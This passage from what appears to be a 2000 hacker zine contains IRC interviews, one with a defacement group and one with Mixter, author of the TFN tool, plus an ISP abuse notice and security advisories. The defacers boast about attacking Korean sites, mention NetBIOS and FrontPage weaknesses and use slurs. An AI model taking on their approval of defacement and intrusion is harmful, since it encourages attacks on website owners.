[21:26] <p4ntera> i give him the patch
[21:26] <SugarKing> if you feel sorry?
[21:26] <Da_Pest> I think its safe to say NT will be out of PTB for a bit eh p4ntera?
[21:26] <SugarKing> haha
[21:26] <p4ntera> thats right
[21:26] <p4ntera> but now we're going for countries
[21:27] <Da_Pest> Oh yah
[21:27] <SugarKing> countries?
[21:27] <p4ntera> as you might have saw, we raped korea pretty bad
[21:27] <p4ntera> =)
[21:27] <SugarKing> ya i noticed a bit
[21:27] <p4ntera> yeah
[21:27] <Da_Pest> Yah'
[21:27] <p4ntera> next is a country that everyone hates
[21:27] <p4ntera> we plan to finish it up tommorow (korean sites that is)
[21:27] <Da_Pest> Yah
[21:28] <SugarKing> what about others calling you guys script kiddies and indeed having script kiddies as members
[21:28] <Da_Pest> We gonna clean up the .kr tomorow eh p4ntera?
[21:28] <p4ntera> well
[21:28] <SugarKing> not to name any *cough*artech*cough*
[21:28] <SugarKing> :)
[21:28] <p4ntera> lets not get into artech
[21:28] <Da_Pest> Ok artech
[21:28] <Da_Pest> I d liek to say something about him
[21:28] <p4ntera> i consider a script kiddie someone who uses scripts and not knows what it actually does
[21:28] <Da_Pest> sorry like
[21:28] <SugarKing> go ahead:)
[21:28] <Da_Pest> Ok
[21:28] <Da_Pest> He is basically a frontpage KIDDY
[21:28] <p4ntera> yeah
[21:29] <SugarKing> yeah I noticed
[21:29] <SugarKing> aol kiddie
[21:29] <p4ntera> he doesnt even know what NTLM authentication is
[21:29] <p4ntera> or
[21:29] <p4ntera> how he uses the everyone/guest group to hack with frontpage
[21:29] <p4ntera> he just randomly tries sites
[21:29] <Da_Pest> He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage
[21:29] <p4ntera> which is pretty fucking lame
[21:29] <Da_Pest> Ok
[21:29] <Da_Pest> Go on attrition
[21:29] <Da_Pest> and look at his hacks
[21:29] <Da_Pest> Im pretty sure every one of them is NT
[21:29] <p4ntera> nah thats not important
[21:29] <SugarKing> yeah they are
[21:29] <p4ntera> lets move on to something else
[21:29] <SugarKing> i don't think he knows what linux is
[21:30] <p4ntera> NT can be raped other ways
[21:30] <Da_Pest> Yah
[21:30] <p4ntera> as u saw with what i did
[21:30] <Da_Pest> But he uses only frontpage
[21:30] <SugarKing> yeah
[21:30] <Da_Pest> Yep
[21:30] <p4ntera> that is correct
[21:30] <SugarKing> how many memebers code?
[21:30] <p4ntera> netbios is a weak fucking protocol
[21:30] <p4ntera> well
[21:30] <Da_Pest> LoL
[21:30] <p4ntera> 5-8
[21:30] <Da_Pest> Very very weak
[21:30] <SugarKing> you guys plan on releasing any exploits you may have written?
[21:30] <p4ntera> yeas
[21:30] <p4ntera> very soon
[21:30] <Da_Pest> Yep
[21:30] <p4ntera> we are probably gonna release some scanners
[21:30] <p4ntera> then maybe some exploits
[21:30] <Da_Pest> Yeah
[21:30] <SugarKing> cool
[21:31] <p4ntera> depends how much sexor i get in the next few days
[21:31] <SugarKing> hah
[21:31] <Da_Pest> LoL
[21:31] <Da_Pest> You know ill be getting sex0r from 3r1/\/ lol
[21:31] <SugarKing> so all members are generally kids? 15-18?
[21:31] <p4ntera> yeah muthafuckas
[21:31] <p4ntera> =)
[21:31] <p4ntera> no
[21:31] <Da_Pest> lol
[21:31] <p4ntera> we have some universty members
[21:31] <p4ntera> but none too old
[21:31] <p4ntera> none too young
[21:31] <SugarKing> oh
[21:31] <p4ntera> around your difference
[21:31] <p4ntera> as u said
[21:32] <SugarKing> what are you guys trying to prove by defacing?
[21:32] <SugarKing> anything?
[21:32] <p4ntera> like i said
[21:32] <p4ntera> the underground aint dead
[21:32] <p4ntera> and
[21:32] <p4ntera> that we, as kids, will not take the bullshit the media spews forth
[21:32] <p4ntera> about hackers and the like
[21:32] <SugarKing> yeah
[21:33] <Da_Pest> Yep
[21:33] <SugarKing> hmm
[21:33] <Da_Pest> I dont like the stereo types
[21:33] <SugarKing> do you guys have a site?
[21:33] <p4ntera> not yet
[21:33] <p4ntera> we will have one, one of our members needs 2 way cable
[21:33] <p4ntera> :P
[21:33] <p4ntera> www.b33r.com soon
[21:33] <SugarKing> heheh cool
[21:33] <Da_Pest> Plus we dont even really need one as of this monet
[21:34] <Da_Pest> moment
[21:34] <SugarKing> ya
[21:34] <Da_Pest> errr.....
[21:34] <SugarKing> do you guys plan on ever stop defacing?
[21:34] <Da_Pest> Me No!
[21:34] <Da_Pest> Well not for a while at least
[21:35] <SugarKing> p4ntera?
[21:35] <Da_Pest> He is afk
[21:35] <SugarKing> oh
[21:35] <Da_Pest> he is walkin his dog for a sec
[21:35] <SugarKing> hah ok
[21:35] <Da_Pest> He will brb
[21:35] <Da_Pest> :)
[21:35] <SugarKing> i hate dogs
[21:35] <SugarKing> they're Pest's:P
[21:35] <Da_Pest> Why?
[21:35] <Da_Pest> Like me : )
[21:35] <SugarKing> ya
[21:36] <Da_Pest> I lub puppys
[21:36] <Da_Pest> :)
[21:36] <Da_Pest> U gots any other questions?
[21:36] <SugarKing> ya, i'm waiting for p4ntera though
[21:36] <Da_Pest> Oh ok
[21:37] *** p4ntera has quit IRC (Ping timeout)
[21:37] <SugarKing> hrm
[21:37] <SugarKing> he'll be back
[21:38] <Da_Pest> Yah
[21:38] <SugarKing> so do you use different handles on IRC because you're afraid of getting caught?
[21:38] <Da_Pest> Not so much getting caught just the fact i dont want to be bothered
[21:39] <Da_Pest> I dont want some kid to see my defacements and bug me on irc
[21:39] <SugarKing> ya
[21:39] <SugarKing> how'd you meet p4ntera?
[21:39] <Da_Pest> but partly because of the illegal activities factor =
[21:39] <Da_Pest> Honestly we live about a few blocks away from eachother
[21:40] <SugarKing> hah cool
[21:40] <Da_Pest> Yah
[21:40] <SugarKing> do you guys talk about your defacements and shit in school?
[21:41] <Da_Pest> Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda
[21:41] <Da_Pest> Shit sorry for my spelling
[21:41] <Da_Pest> Im just really cold
[21:41] <SugarKing> do your friends know that you guys are into computers?
[21:41] <SugarKing> heh
[21:41] <SugarKing> it's aight
[21:42] <Da_Pest> Umm... Well some do but I dont think any know im into defacing
[21:42] <Da_Pest> Me and p4ntera are the only ones out of my cru that are into this shit
[21:42] <SugarKing> ya
[21:43] <SugarKing> same as me and Clientel
[21:43] <Da_Pest> cool
[21:43] <SugarKing> we have one class together and he doesn't shut the hell up
[21:43] <Da_Pest> LoL
[21:43] <Da_Pest> What does he talk about?
[21:44] <SugarKing> about his elite defacements
[21:44] <SugarKing> haha nah
[21:44] <Da_Pest> brb man im gonna log on a nother server im lagged
[21:44] <SugarKing> he talks about computers in general
[21:44] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?)
[21:44] <SugarKing> aight
[21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance
[21:45] <Da_Pest> Back!
[21:46] <SugarKing> ok
[21:46] <SugarKing> where the hell is p4ntera?
[21:46] <Da_Pest> He walking his damn dog
[21:46] <SugarKing> i'll kill it
[21:46] <Da_Pest> Sorry bout the wait
[21:46] <Da_Pest> LoL
[21:46] <Da_Pest> he should be here soon
[21:47] <SugarKing> ok
[21:47] <Da_Pest> sorry for the wait
[21:47] <SugarKing> np
[21:48] <Da_Pest> do u code?
[21:48] <SugarKing> yup
[21:48] <SugarKing> btw, to set the record, since i'm logging and it's going to be posted
[21:48] <SugarKing> I left this group because it was only defacing
[21:49] <SugarKing> I didn't want to do it no more
[21:49] <Da_Pest> Ok...
[21:49] <SugarKing> I'll keep my opinion about defacing to myself
[21:49] <Da_Pest> Why not?
[21:49] <SugarKing> but, I'd rather code some nasty shit:)
[21:49] <Da_Pest> ok gitcha
[21:49] <Da_Pest> Alot of people dont like defacing
[21:50] <Da_Pest> But the way I see it...
[21:50] <SugarKing> I don't see a need for it
[21:50] <Da_Pest> If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work
[21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance
[21:51] <SugarKing> wb
[21:51] <SugarKing> dog walker:P
[21:51] <p4ntera> thanks
[21:51] <p4ntera> sorry about that
[21:51] <p4ntera> hah
[21:51] <Da_Pest> Yah wb
[21:51] <p4ntera> yeah man your mom is rough with the leash
[21:51] <p4ntera> she keeps on bitin git
[21:51] <Da_Pest> loil
[21:51] <p4ntera> *biting it
[21:51] <SugarKing> anyways
[21:51] <p4ntera> =)
[21:51] <SugarKing> back to the question
[21:51] <SugarKing> do you guys plan on ever stop defacing?
[21:51] <p4ntera> yeah anyways
[21:51] <p4ntera> maybe
[21:51] <p4ntera> when some of us gets booked
[21:52] <p4ntera> or we own the world
[21:52] <Da_Pest> LoL
[21:52] <p4ntera> which ever one comes first
[21:52] <SugarKing> heh
[21:52] <Da_Pest> Me never I wont stop
[21:52] <p4ntera> yeah he well
[21:52] <p4ntera> *will
[21:52] <Da_Pest> I enjoy it
[21:52] <p4ntera> i would just like to add something?
[21:52] <p4ntera> if thats alright?
[21:52] <SugarKing> go ahead
[21:52] <SugarKing> you got the floor:)
[21:52] <Da_Pest> I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed
[21:52] <p4ntera> you asked whats with the "underground aint dead part"
[21:52] <SugarKing> ya
[21:52] <p4ntera> well
[21:52] <p4ntera> if u noticed last year
[21:53] <p4ntera> groups like gH,irc.psychic.com and h4g15 were defacing major websites
[21:53] <SugarKing> ya
[21:53] <p4ntera> showing there weak security
[21:53] <p4ntera> now we got people like "crime boys" and artech defacing websites
[21:53] <Da_Pest> Exactly
[21:53] <p4ntera> and these are the people that will protect potentially high up websites?
[21:53] <p4ntera> i dont want my bank card protected by these frontpage kiddies
[21:54] <Da_Pest> Ok course
[21:54] <p4ntera> u know what i mean?
[21:54] <SugarKing> yah
[21:54] <Da_Pest> and the sad part is alot of admins are like that
[21:54] <SugarKing> true in a sense
[21:54] <p4ntera> yeah thats right they are
[21:54] <Da_Pest> And i mean alot
[21:54] <SugarKing> but what about groups like L0pht, who made their fame without defacing?
[21:54] <p4ntera> well
[21:54] <p4ntera> they were made in the 80's
[21:54] <Da_Pest> Like look at all of artechs for god sakes
[21:54] <p4ntera> when defacing was unheard of
[21:55] <p4ntera> bbs hacking
[21:55] <SugarKing> what about now?
[21:55] <p4ntera> they did do the potentially "dark" side of hacking
[21:55] <SugarKing> they could easily deface now
[21:55] <p4ntera> yeah but they outgrown that
[21:55] <p4ntera> its kind of a teenage thing
[21:55] <SugarKing> so you saying you're gonna outgrow it?
[21:55] <p4ntera> fuck when i heard mosthated was 19 i was shocked
[21:55] <p4ntera> eventually
[21:55] <SugarKing> heh
[21:55] <SugarKing> ya
[21:56] <Da_Pest> I dont think I will
[21:56] <Da_Pest> until i get booked
[21:56] <p4ntera> yeah he will
[21:56] <p4ntera> heh
[21:56] <p4ntera> anyways
[21:56] <Da_Pest> Umm...
[21:56] <Da_Pest> No
[21:56] <SugarKing> in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses
[21:56] <p4ntera> yeah
[21:56] <SugarKing> which is true
[21:56] <p4ntera> funny thing is
[21:56] <Da_Pest> Tru dat
[21:56] <p4ntera> we have 2 members of team echo
[21:56] <p4ntera> in our group
[21:56] <p4ntera> nameless of course
[21:56] <SugarKing> ya I know
[21:56] <Da_Pest> hehe =)
[21:56] <p4ntera> well, had
[21:56] <SugarKing> had?
[21:56] <p4ntera> one got booked
[21:56] <SugarKing> they left?
[21:57] <SugarKing> who?
[21:57] <p4ntera> another one is still in
[21:57] <p4ntera> Analognet
[21:57] <SugarKing> Analognet was in ph33r the b33r?
[21:57] <p4ntera> yep
[21:57] <Da_Pest> :)
[21:57] <p4ntera> dont be so shocked
[21:57] <SugarKing> i didn't know
[21:57] <p4ntera> u know who taught him how to hack nt?
[21:57] <p4ntera> your talking to him right now
[21:57] <SugarKing> heh
[21:57] <p4ntera> he learned very fast
[21:57] <Da_Pest> p4ntera is truly 1337 sh1t lol
[21:57] <p4ntera> within a month he knew what i knew
[21:57] <Da_Pest> He taught me alot
[21:58] <p4ntera> and became a nt admin
[21:58] <p4ntera> damn right negro
[21:58] <SugarKing> cool
[21:58] <p4ntera> =)
[21:58] <Da_Pest> I think as a group we are progressing
[21:58] <p4ntera> i totally agree
[21:58] <p4ntera> 100%
[21:58] <SugarKing> so anything we should know about with the future of ph33r the b33r?
[21:58] <p4ntera> yeah
[21:58] <Da_Pest> We are slowly moving are way up to bigger and better things
[21:58] <p4ntera> we are going to be big
[21:58] <p4ntera> as da_pest is saying
[21:59] <Da_Pest> And eventually we are gonna pull a gH and own a big ass site
[21:59] <p4ntera> we are the only thing that comes close to a good group
[21:59] <p4ntera> of course
[21:59] <Da_Pest> And that will be a grand finale
[21:59] <p4ntera> my boys wkD are there with us
[21:59] <Da_Pest> Yah
[21:59] <SugarKing> oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed?
[21:59] <p4ntera> werd ka0x and BlazinWeed =)
[21:59] <p4ntera> no
[21:59] <p4ntera> i know my rights
[21:59] <p4ntera> too well in fact
[21:59] <Da_Pest> Same
[21:59] <p4ntera> entrapment is a beautifal thing my friend
[21:59] <p4ntera> =)
[22:00] <Da_Pest> Plus we make sure people are legit before they join
[22:00] <p4ntera> and thats why we hang on lame networks
[22:00] <SugarKing> any last comments? shout out's? flames?
[22:00] <p4ntera> cause efnet is like 98% sniffed
[22:00] <p4ntera> well
[22:00] <p4ntera> i would like to say to sinfony, aka john dough
[22:00] <Da_Pest> lol
[22:00] <Da_Pest> DIE
[22:00] <p4ntera> that i respect his skills
[22:00] <p4ntera> i recently found out he is r3p3nt from dhc, which kinda sucks for me
[22:00] <p4ntera> because i respect dhc as a group
[22:00] <p4ntera> and him especially
[22:01] <p4ntera> even though he flamed us
[22:01] <p4ntera> he has his skills
[22:01] <p4ntera> but he is still a ass
[22:01] <p4ntera> that will likely never change
[22:01] <Da_Pest> hehe :)
[22:01] <SugarKing> heh
[22:01] <SugarKing> anything from you, Pest?
[22:01] <Da_Pest> He is a bigger ass then m4rth4 lol
[22:01] <Da_Pest> Yah i just gotta say look out bitches cause PTB Is climbing our way up
[22:01] <p4ntera> heh
[22:02] <Da_Pest> And soon we will not be able to be touched
[22:02] <p4ntera> i would like to say some more as well
[22:02] <p4ntera> that is right
[22:02] <p4ntera> these 3rd world countries are our playgrounds
[22:02] <p4ntera> once we master our abilities, we are coming for the higher ups
[22:02] <Da_Pest> Yah
[22:02] <SugarKing> that it?:)
[22:02] <p4ntera> once we recruit some more members, we are coming
[22:02] <p4ntera> you cannot stop it
[22:02] <p4ntera> no one can =)
[22:02] <Da_Pest> Oh Yah
[22:03] <p4ntera> and
[22:03] <p4ntera> i would like to say
[22:03] <p4ntera> Sugarking is one sexy cum muffin
[22:03] <p4ntera> =)
[22:03] <SugarKing> hahah
[22:03] <SugarKing> thanks for the interview d00dz
[22:03] <SugarKing> ok
[22:03] <p4ntera> heh
[22:04] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?)
Session Close: Thu May 04 22:04:39 2000
@HWA
xx.x How to get banned from your ISP for *legal* activity in Canada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 3 May 2000 12:41:14 -0400
From: abuse@rogers.home.net
To: m*@home.com
Subject: Rogers@Home Network Security Dept. notice - Unauthorized Access Attempt
Dear Mr. XXXXXXXXXX XXXXXX:
It has been brought to our attention that an attempt to gain access/issue
commands to a computer system without the consent of the owner was traced to
your provisioned IP address. This may be a deliberate attempt to access
these computers, or your machine may have been compromised, in either event
you must make sure your computer is not used for any prohibited activity.
Please look into this and feel free to email us should you have any
questions. I have included the logs and/or complaint below.
As a result of our investigation, we have also found several servers
operating on our network from your connection. As ALL servers are a
violation of our End User Agreement, please remove all servers immediately.
To avoid any interruption of service, please email us with confirmation once
you have permanently removed all servers.
Sincerely,
Rogers@Home Network Security Dept.
http://rogers.home.com/CustomerSupport/Surf-Safe.html
Apr 27 02:29:27 crow named[64]: unapproved query from [24.XXX.XXX.XXX].1041
for "version.bind"
Apr 26 23:36:43 fionn rpcbind: refused connect from 24.XXX.XXX.XXX to dump()
HTTP/1.1 401 Authorization Required
Date: Tue, 08 Jan 1980 17:13:46 GMT
Server: Apache/1.3.12 (Unix) PHP/4.0RC1
WWW-Authenticate: Basic realm="Intranet"
Connection: close
Content-Type: text/html; charset=iso-8859-1
@HWA
18.0 [SEC] Security Bulletins Digest May 02nd 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To:BugTraq
Subject:Security Bulletins Digest (fwd)
Date:Tue May 02 2000 18:16:22
Author:Justin Tripp
Message-ID:<Pine.HPX.4.21.0005030816110.2128-100000@zap.ee.byu.edu>
---------- Forwarded message ----------
Date: Wed, 3 May 2000 04:48:08 -0700 (PDT)
From: IT Resource Center <support_feedback@us-support.external.hp.com>
To: security_info@us-support.external.hp.com
Subject: Security Bulletins Digest
HP Support Information Digests
===============================================================================
o HP Electronic Support Center World Wide Web Service
---------------------------------------------------
If you subscribed through the IT Resource Center and would
like to be REMOVED from this mailing list, access the
IT Resource Center on the World Wide Web at:
http://us.itresourcecenter.hp.com/
Login using your IT Resource Center User ID and Password.
Then select Support Information Digests. You may then unsubscribe from the
appropriate digest.
===============================================================================
Digest Name: Daily Security Bulletins Digest
Created: Wed May 3 3:00:03 PDT 2000
Table of Contents:
Document ID Title
--------------- -----------
HPSBUX9910-104 Sec. Vulnerability regarding automountd (rev. 01)
The documents are listed below.
-------------------------------------------------------------------------------
Document ID: HPSBUX9910-104
Date Loaded: 20000502
Title: Sec. Vulnerability regarding automountd (rev. 01)
-------------------------------------------------------------------------
**REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00104, 21 Oct 99
Last Revised: 2 May 2000
-------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM: automountd can run user programs as root.
PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.20 and 11.00.
DAMAGE: Allows users to gain root privileges
SOLUTION: Apply the patches noted below.
AVAILABILITY: Patches are now available.
CHANGE SUMMARY: This revision contains patch information.
-------------------------------------------------------------------------
I.
A. Background
This problem was originally reported in CERT Advisory CA-99-05,
regarding the vulnerability in automountd which allows an
intruder to execute arbitrary commands with the privileges of
the automountd process.
We had previously reported that Hewlett-Packard platforms were
not vulnerable; we now have new information showing that we
are indeed vulnerable.
**REVISED 01**
B.| Fixing the problem
|
| For HP-UX release 11.00 apply PHNE_20371,
| for HP-UX release 10.20 apply PHNE_20628.
|
| NOTE: There are various patch dependencies associated with
| this patch, and rebooting is required.
C. To subscribe to automatically receive future NEW HP Security
Bulletins from the HP IT Resource Center via electronic mail,
do the following:
Use your browser to get to the HP IT Resource Center page
at: http://itrc.hp.com
Under the heading "Maintenance and Support" click on the link
"More..." and at the very bottom of that next page, click on
"Support Information Digests" underneath the heading NOTIFICATIONS.
Now login on the IT Resource Center Welcome page, using your user
ID and password (or register for one). You will need to login
in order to gain access to many areas of the ITRC. Remember to
save the User ID assigned to you, and your password.
Once you are on the Support Information Digests Main page,
follow the instructions there.
To -subscribe- to future HP Security Bulletins or other
Technical Digests, click the check box (in the left column)
for the appropriate digest and then click the "Update
Subscriptions" button at the bottom of the page.
To -review- bulletins already released from our archive, simply
click on the link near the top of the list entitled
"HP Security Bulletins Archive."
or
To -gain access- to the Security Patch Matrix, select
the link for "The Security Bulletins Archive". Once in
the archive the third link is to our current Security
Patch Matrix. Updated daily, this matrix categorizes security
patches by platform/OS release, and by bulletin topic.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com
~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9910-104--------------------------------------
@HWA
19.0 [b0f] Latest releases from Buffer Overflow Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: http://b0f.freebsd.lublin.pl/
Not *everything* that is new has been published here. Check the site to
see what you may be missing, meanwhile a good cross section of b0f's new
releases is featured here in following sections, with a couple of advisories
first then some new code. - Ed
<Cont'd>
@HWA
20.0 [HWA] Informal chat/interview with Mixter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mixter <mixter@newyorkoffice.com>
http://mixter.warrior2k.com/
Cruciphux <Cruciphux@dok.org>
http://welcome.to/HWA.hax0r.news/
Mixter is the author of TFN (Tribe Flood Network) software which was
recently brought into the limelight by Mafiaboy who used a variant called
mstream to attack some big name web sites and effectively shut them down
for several hours.
->
-> Technical Overview:
->
-> See Packetstorm http://packetstorm.securify.com
-> http://packetstorm.securify.com/papers/unix/tfn.analysis.txt
->
-> Analysis of the "Tribe Flood Network", or "TFN", by Mixter.
-> TFN is a powerful distributed attack tool and backdoor currently
-> being developed and tested on a large number of compromised
-> Unix systems on the Internet.
->
Sunday afternoon May 21st 2000.
[ For the most part un-edited so you can decide what is ]
[ interesting and what isn't, general chatter has been ]
[ removed and hostnames blanked out. ]
***** ADDENDUM/CORRECTION ***************************************************
[ NOTE: I was incorrectly under the assumption at the time of this interview
that Mafiaboy used Mixter's code to do his DDoS damage, this turned out to
be false, in fact mstream (discussed elsewhere with source code) was used and
NOT TFN. My apologies for the inaccuracies. - Cruciphux ]
******************************************************************************
Session Start: Sun May 21 13:13:43 2000
Session Ident: Mixter (mixter@*.net)
[13:19] <Cruciphux> what inspired you to write the TFN software?
[13:20] <Cruciphux> what were your goals, thoughts, intended uses
[13:20] <Cruciphux> :
[13:20] <Mixter> hmm
[13:20] <Mixter> well, I coded it for the same purpose I code everything,
because I simply like coding, and now or then you'll create something
important
[13:21] <Mixter> if not, coding something is always a new exercise for
yourself...
[13:21] <Cruciphux> you could code something but still not release it
publicly, was it merely POC or did you expect it to be used?
[13:22] <Mixter> I've heard about these tools on irc like two years ago, at
least that people wanted to create them
[13:22] <Mixter> POC=? :)
[13:22] <Mixter> sorry I spend way too little time in usenet etc.
[13:22] <Cruciphux> Proof Of Concept
[13:22] <Cruciphux> np
[13:22] <Mixter> o
[13:23] <Mixter> no, the first version was just a nice powerful tool to
write up
[13:23] <Cruciphux> what is your view on the Mafiaboy debacle and how do you
feel about your software being used to attack major web sites?
[13:24] <Mixter> it was interesting to see this concept worked, and you
could contact hosts at a fast speed and with tunneling through raw packets
and all
[13:24] <Mixter> tfn2k, was however a pure POC.. any kiddie who tried to use
it will know how buggy it is :)
[13:25] <Cruciphux> can you explain the concept to us and how it works?
[13:25] <Mixter> I think, when the government and media forces need
something to puff out, they'll always find something
[13:25] <Mixter> if it wasnt for the dos attacks, it wouldve been something
else
[13:26] <Mixter> I believe all packet kiddies out there should get a life...
but they do more damage to irc servers and users than anything else, though
[13:26] <Cruciphux> true but it was you that made the tool available, they
may not otherwise have decided to attack these sites
[13:27] <Cruciphux> do you feel responsible at all?
[13:28] <Mixter> the plain concept of distributed attacks is to start
processes from a lot of hosts, simple as that. in distributed packet
flooding, you launch all processes against a single target. theoretically,
before all the tools came out, when people just logged on to a lot of shells
and run their udp/syn flooders against 1 target, that was the same stuff.
what the new programs do, raw tunneling, or encrypted tcp control
connections are just feature improvements to the same
[13:28] <Mixter> that they have a big impact on feasibility and speed of
distributed attacks and other things like distributed scanning
[13:28] <Mixter> hm ok :)
[13:29] <Mixter> its important to realize that the "authorities" biggest
instrument is false guilt
[13:30] <Mixter> people can't withdraw from it, and if they do, they're
still being persecuted.. so I believe that people like mafiaboy arent
innocent since they knew what they were doing, but simply sitting in front
of your home computer and typing in commands can hardly make you a
"criminal"
[13:31] <Cruciphux> would you extend that view to "hacking" also?
[13:31] <Cruciphux> whats your view on people who deface websites?
[13:32] <Mixter> if you talk about hacking as in breaking into servers, I
have no ethical problems with it as long as it is for the cause of improving
the security, e.g. patching and/or notifying the people
[13:33] <Cruciphux> so you are ok with non destructive intrusion so long as
you patch the hole you came in through?
[13:33] <Mixter> website defacements in general are destructive, because
they can harm companies by destroying their images.. so it isnt something
people should do.. exceptions are of course sites that stand for violation
of human and individual rights
[13:33] <Cruciphux> what if the system is borrowed to say, host a bot on irc
or launch further intrusion attempts?
[13:34] <Cruciphux> yes I personally believe that socio-political defacements
with a valid message are justifiable
[13:34] <Mixter> well, I DONT recommend intrusion at all in these big
brotherish times, it's far more easy to do productive, legal work, by
working for a company or founding your own one, but lets say I have no
problem with it, if no damage is created
[13:35] <Cruciphux> what other software are you working on presently?
[13:35] <Mixter> if they hack systems to host a bot, that's a pretty
clueless and dangerous way... if they HAVE to intrude or if they dont have
the small money, the only acceptable way is to contact the administration,
notify them of the problem and ask for resources in exchange for securing
their site
[13:36] <Mixter> yeah.. it's pretty lame though, when you see some
anti-human-rights site defaced, and you have in black on gray one line of
text that says "pr0pz to muh brothers of the gibson h4xing cl4n"
[13:36] <Mixter> ;/
[13:37] <Cruciphux> considering the little cost involved in offering a
hacker system resources in exchange for securing a server it seems strange
it doesn't happen more often
[13:37] <Mixter> well, security software, auditing software and more.. the
problem is I can't disclose that without permission from my employees, and I
wouldn't break my agreement
[13:37] <Mixter> err employers
[13:38] <Cruciphux> you currently are employed in the security field, were
you ever a grey-hat?
[13:38] <Cruciphux> i suppose thats a round about way of asking if you have
hacked yourself in the past
[13:38] <Mixter> yes it does.. but the whole thing is based on trust, and if
it would become practice that hackers outline vulnerabilities and then get
local access (from where they have LOTS of insider attacking possibilities),
most people would have a problem trusting them
[13:39] <Mixter> heh.. well yeah, I broke into hosts without permission in
the past
[13:39] <Cruciphux> trust is earned however and the notification of
intrusion would be a demonstration of intent
[13:39] <Mixter> at the beginning of my career, I started out with
developing eggdrop/tcl (not for takeover, just for defense and fun for the
most part)
[13:39] <Cruciphux> how old are you?
[13:40] <Mixter> that was 2 1/2 years ago.. I hadn't a clue about the legal
issues back then, and wasn't even certain if what I was doing is illegal
[13:42] <Mixter> ah, the notification of intrusion could also be used as a
social engineering (<- stupid term :P) method, to get the trust, and then
attack them from the inside with their consent :>
[13:42] <Cruciphux> how did you get into computers? what was your initial
exposure? first machine?
[13:43] <Mixter> no, I don't care about that, after about 50 news agencies
published name, address, birthdate, and photos of me back in february :P
[13:43] <Cruciphux> k
[13:45] <Cruciphux> how did you get into computers? what was your initial
exposure? first machine?
[13:46] <Mixter> my initial exposure was a c64 I used when I was about 6-8
yrs old
[13:46] <Mixter> i programmed a lot in basic, some machine language later :)
[13:47] <Cruciphux> Are you self taught or do you have any official
schooling in programming etc?
[13:47] <Mixter> if people wouldnt all start with big PC OS's like windows,
they'd probably figure out programming and the ins and outs of computing
much better and faster...
[13:47] <Cruciphux> yeah I started on a vic-20
[13:47] <Cruciphux> wrote a bbs on it
[13:47] <Cruciphux> it had 4k ram
[13:47] <Mixter> oh well, the nice feds took away my computer back in 98
[13:48] <Cruciphux> for what?
[13:48] <Mixter> i hadnt had a pc for 3 months, that was when I read awful
lots of programming, networking etc books and really got into the technical
aspects
[13:48] <Mixter> for installing some bots on a couple of hosts :]
[13:48] <Cruciphux> *g*
[13:49] <Cruciphux> thats about it really, thanks for yer time, any closing
comments?
[13:49] <Mixter> hey, nobody's perfect. I really *was* clueless about the
tracing stealthing etc aspects of hacking, leave alone the legal stuff back
then.. just exploring and doing anything I could :)
[13:49] <Cruciphux> :-)
[13:49] <Mixter> nope, if you dont have any closing questions ;)
[13:49] <Cruciphux> when I sold my first c64 system, the guy that bought had
nagged and nagged me
[13:50] <Mixter> hehe
[13:50] <Cruciphux> for some phreaking software i had, I finally gave in and
let him have it warning him not to
[13:50] <Cruciphux> actually use it unless he learned how it worked etc
[13:50] <Cruciphux> he called me a week later
[13:50] <Mixter> phreaking is something nice.. I really wish I could've done
it in the time and/or country when it was feasible and not too dangerous
[13:50] <Cruciphux> he was busted and had the $750 system confiscated
[13:50] <Cruciphux> :)
[13:51] <Mixter> aw :)
[13:51] <Cruciphux> I was into it when I was younger
[13:51] <Cruciphux> it was fun
[13:51] <Mixter> i spent $3000 on my first PC
[13:51] <Cruciphux> yeh same here
[13:51] <Mixter> the one that got confiscated ;x
[13:52] <Cruciphux> I paid $900 for a used 9M hard drive for my c64 bbs and
$1000 for the USR 9600 external modem
[13:52] <Cruciphux> heh
[13:54] <Cruciphux> funny thinking about a 9 megabyte hard disk these days,
it was the size of a ups
[13:55] <Cruciphux> actually it might have been 7M
[13:55] <Cruciphux> anyways we're all done i'll ttyl - thanks
Session Close: Sun May 21 13:55:44 2000
END
@HWA
21.0 [b0f] b0f3-ncurses.txt FreeBSD 3.4 libncurses buffer overflow by venglin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2000-04-24
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
Application: NCURSES 1.8.6 / FreeBSD 3.4-STABLE
Vendor: FreeBSD Inc.
WWW: www.freebsd.org
